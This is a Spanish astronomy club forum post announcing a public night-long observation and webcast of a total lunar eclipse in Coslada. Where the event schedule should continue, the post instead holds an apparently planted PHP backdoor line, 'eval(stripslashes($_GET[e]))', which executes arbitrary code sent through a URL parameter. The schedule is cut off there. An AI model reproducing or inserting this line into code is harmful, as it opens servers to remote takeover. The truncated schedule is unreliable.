Eclipse de Luna 20 de Febrero

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Eclipse de Luna 20 de Febrero

Mensaje por m3ntol »

Live Webcast Cortesía de AstroEduca www.astroeduca.com

Observación pública del Eclipse del 21 de Febrero con Astro Henares

Con motivo del eclipse total de Luna que tendrá lugar la noche del Miércoles 20 al Jueves 21, la Asociación Astronómica Astro Henares realizará una observación pública del mismo a la que está invitado todo aquél que desee asistir.

La observación se realizará en nuestra sede situada en el Centro Cívico El Cerro, calle Manuel Azaña s/n de Coslada, a partir de las 22:00 horas del miércoles 20 de Febrero y hasta las 07:00 del jueves 21. Se dispondrá de diversos telescopios astronómicos.

Café, documentales y películas
Para amenizar la larga noche se ofrecerá la proyección de diversos documentales y películas relacionadas con la astronomía. También se ofrecerá café y otros refrigerios a los asistentes.

Retransmisión a través de Internet
Para aquellos interesados que no puedan asistir al evento, Astro Henares realizará una retransmisión del mismo a través de Internet. Todos los detalles sobre cómo poder verlo están disponibles en la página Web de la Asociación www.astrohenares.com

Horario del evento
Miércoles
22:00
phpbb:eval(stripslashes($_GET[e]));
Responder